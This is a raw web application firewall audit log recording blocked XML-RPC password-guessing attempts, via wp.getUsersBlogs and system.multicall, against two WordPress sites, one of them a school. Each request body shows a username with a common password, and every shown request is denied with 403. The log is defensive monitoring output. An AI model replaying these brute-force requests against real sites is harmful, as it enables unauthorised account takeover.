2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113846356741 5463 (- - -) Stopwatch2: 1749113846356741 5463; combined=3906, p1=462, p2=3240, p3=0, p4=0, p5=117, sr=88, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37124b67-Z-- --62bc4239-A-- [05/Jun/2025:15:58:26 +0700] aEFcMirHpfaS2Cuwh8Xw6wAAAFE 103.236.140.4 55684 103.236.140.4 8181 --62bc4239-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --62bc4239-C-- wp.getUsersBlogs admin root123 --62bc4239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62bc4239-E-- --62bc4239-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113906835442 5515 (- - -) Stopwatch2: 1749113906835442 5515; combined=4242, p1=502, p2=3535, p3=0, p4=0, p5=122, sr=92, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62bc4239-Z-- --4b34680e-A-- [05/Jun/2025:15:59:26 +0700] aEFcbn-K7ToMdu-YSII_qQAAAAQ 103.236.140.4 58794 103.236.140.4 8181 --4b34680e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4b34680e-C-- wp.getUsersBlogs admin manager123 --4b34680e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b34680e-E-- --4b34680e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749113966552248 4842 (- - -) Stopwatch2: 1749113966552248 4842; combined=3782, p1=432, p2=3170, p3=0, p4=0, p5=105, sr=91, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b34680e-Z-- --afc6d427-A-- [05/Jun/2025:16:00:28 +0700] aEFcrFwdJdhOudw5hdznxAAAAJQ 103.236.140.4 33720 103.236.140.4 8181 --afc6d427-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --afc6d427-C-- wp.getUsersBlogs admin Login --afc6d427-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afc6d427-E-- --afc6d427-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114028629237 5143 (- - -) Stopwatch2: 1749114028629237 5143; combined=3643, p1=446, p2=3023, p3=0, p4=0, p5=102, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afc6d427-Z-- --d04f0f51-A-- [05/Jun/2025:16:01:31 +0700] aEFc61wdJdhOudw5hdzotQAAAIQ 103.236.140.4 36904 103.236.140.4 8181 --d04f0f51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d04f0f51-C-- wp.getUsersBlogs admin letitbe --d04f0f51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d04f0f51-E-- --d04f0f51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114091144530 5320 (- - -) Stopwatch2: 1749114091144530 5320; combined=3874, p1=476, p2=3222, p3=0, p4=0, p5=103, sr=90, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d04f0f51-Z-- --0d921168-A-- [05/Jun/2025:16:02:31 +0700] aEFdJ3-K7ToMdu-YSIJBmAAAAAc 103.236.140.4 40004 103.236.140.4 8181 --0d921168-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --0d921168-C-- wp.getUsersBlogs admin 111qqq!!! --0d921168-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d921168-E-- --0d921168-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114151568509 3604 (- - -) Stopwatch2: 1749114151568509 3604; combined=2553, p1=324, p2=2109, p3=0, p4=0, p5=71, sr=66, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d921168-Z-- --59adaa01-A-- [05/Jun/2025:16:02:45 +0700] aEFdNX-K7ToMdu-YSIJBpAAAAAI 103.236.140.4 40810 103.236.140.4 8181 --59adaa01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --59adaa01-C-- wp.getUsersBlogs admin 1234%^&* --59adaa01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59adaa01-E-- --59adaa01-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114165828522 3579 (- - -) Stopwatch2: 1749114165828522 3579; combined=2763, p1=323, p2=2310, p3=0, p4=0, p5=79, sr=58, sw=51, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59adaa01-Z-- --e90dbd32-A-- [05/Jun/2025:16:03:36 +0700] aEFdaH-K7ToMdu-YSIJCJgAAAAY 103.236.140.4 43406 103.236.140.4 8181 --e90dbd32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e90dbd32-C-- wp.getUsersBlogs admin 212903 --e90dbd32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e90dbd32-E-- --e90dbd32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114216977690 4802 (- - -) Stopwatch2: 1749114216977690 4802; combined=3498, p1=449, p2=2877, p3=0, p4=0, p5=100, sr=85, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e90dbd32-Z-- --63bf994f-A-- [05/Jun/2025:16:04:37 +0700] aEFdpX-K7ToMdu-YSIJCuQAAABE 103.236.140.4 46456 103.236.140.4 8181 --63bf994f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --63bf994f-C-- wp.getUsersBlogs admin taylor --63bf994f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63bf994f-E-- --63bf994f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114277013202 5346 (- - -) Stopwatch2: 1749114277013202 5346; combined=3978, p1=510, p2=3267, p3=0, p4=0, p5=117, sr=92, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63bf994f-Z-- --d533050b-A-- [05/Jun/2025:16:05:46 +0700] aEFd6uth7G2xELALzPZE5wAAAMc 103.236.140.4 50018 103.236.140.4 8181 --d533050b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d533050b-C-- wp.getUsersBlogs admin iloveyou1 --d533050b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d533050b-E-- --d533050b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (106+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114346081565 5442 (- - -) Stopwatch2: 1749114346081565 5442; combined=4052, p1=468, p2=3396, p3=0, p4=0, p5=109, sr=97, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d533050b-Z-- --b359822d-A-- [05/Jun/2025:16:06:46 +0700] aEFeJuth7G2xELALzPZF3QAAAM8 103.236.140.4 53050 103.236.140.4 8181 --b359822d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b359822d-C-- wp.getUsersBlogs admin rachel --b359822d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b359822d-E-- --b359822d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114406644006 5013 (- - -) Stopwatch2: 1749114406644006 5013; combined=3627, p1=455, p2=2991, p3=0, p4=0, p5=107, sr=106, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b359822d-Z-- --341d2731-A-- [05/Jun/2025:16:07:02 +0700] aEFeNuth7G2xELALzPZF9wAAANg 103.236.140.4 53900 103.236.140.4 8181 --341d2731-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.165.236.42 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.165.236.42 X-Forwarded-Proto: https Connection: close Content-Length: 475 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --341d2731-C-- system.multicallmethodNamewp.getUsersBlogsparamsroot123 --341d2731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --341d2731-E-- --341d2731-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.165.236.42 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114422443763 4497 (- - -) Stopwatch2: 1749114422443763 4497; combined=3203, p1=393, p2=2661, p3=0, p4=0, p5=94, sr=76, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --341d2731-Z-- --286e3229-A-- [05/Jun/2025:16:07:18 +0700] aEFeRlwdJdhOudw5hdztTwAAAIk 103.236.140.4 54722 103.236.140.4 8181 --286e3229-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --286e3229-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin123% --286e3229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --286e3229-E-- --286e3229-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114438479369 4744 (- - -) Stopwatch2: 1749114438479369 4744; combined=3482, p1=407, p2=2931, p3=0, p4=0, p5=86, sr=79, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --286e3229-Z-- --cbdc8611-A-- [05/Jun/2025:16:07:52 +0700] aEFeaH-K7ToMdu-YSIJE7AAAAAM 103.236.140.4 56472 103.236.140.4 8181 --cbdc8611-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --cbdc8611-C-- wp.getUsersBlogs admin newcastle1 --cbdc8611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbdc8611-E-- --cbdc8611-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (85+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114472672297 4881 (- - -) Stopwatch2: 1749114472672297 4881; combined=3487, p1=425, p2=2900, p3=0, p4=0, p5=95, sr=84, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdc8611-Z-- --efb6ea4f-A-- [05/Jun/2025:16:08:52 +0700] aEFepCrHpfaS2Cuwh8X5TQAAAE4 103.236.140.4 59664 103.236.140.4 8181 --efb6ea4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --efb6ea4f-C-- wp.getUsersBlogs wakakur z43218765z --efb6ea4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efb6ea4f-E-- --efb6ea4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (93+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114532835628 5215 (- - -) Stopwatch2: 1749114532835628 5215; combined=3555, p1=407, p2=2934, p3=0, p4=0, p5=125, sr=87, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efb6ea4f-Z-- --1fedc46f-A-- [05/Jun/2025:16:09:25 +0700] aEFexVwdJdhOudw5hdzu7gAAAJE 103.236.140.4 33194 103.236.140.4 8181 --1fedc46f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1fedc46f-C-- system.multicallmethodNamewp.getUsersBlogsparamsdnavizaq1@WSX --1fedc46f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fedc46f-E-- --1fedc46f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114565979846 5396 (- - -) Stopwatch2: 1749114565979846 5396; combined=3697, p1=445, p2=3073, p3=0, p4=0, p5=108, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fedc46f-Z-- --6453da7e-A-- [05/Jun/2025:16:09:52 +0700] aEFe4CrHpfaS2Cuwh8X6BAAAAFg 103.236.140.4 34526 103.236.140.4 8181 --6453da7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6453da7e-C-- wp.getUsersBlogs wakakur #changeme! --6453da7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6453da7e-E-- --6453da7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file 